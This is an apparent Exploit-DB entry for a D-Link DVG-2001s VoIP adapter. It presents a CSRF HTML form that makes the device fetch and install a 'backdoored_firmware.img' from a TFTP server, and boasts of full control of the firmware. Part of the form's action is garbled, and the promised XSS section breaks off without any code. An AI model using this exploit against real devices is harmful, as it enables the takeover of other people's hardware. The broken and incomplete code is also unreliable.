D-Link VoIP Phone Adapter - XSS/CSRF Remote Firmware Overwrite

ID EDB-ID:7920
Type exploitdb
Reporter Michael Brooks
Modified 2009-01-29T00:00:00


D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite. Remote exploit for hardware platform

                                            D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007

Better than just remote code execution,  you control the firmware.

	<form action=",0,0,0,0,0,0,0,0"
		<input name="page_HiddenVar" value="0">
		<input name="TFTPServerAddress1" value="10">
		<input name="TFTPServerAddress2" value="1">
		<input name="TFTPServerAddress3" value="1">
		<input name="TFTPServerAddress4" value="1">
		<input name="FirmwareUpdate" value="enabled">
		<input name="FileName" value="backdoored_firmware.img">
		<input type=submit value="attack">
and xss which can be used for csrf bypass:

# milw0rm.com [2009-01-29]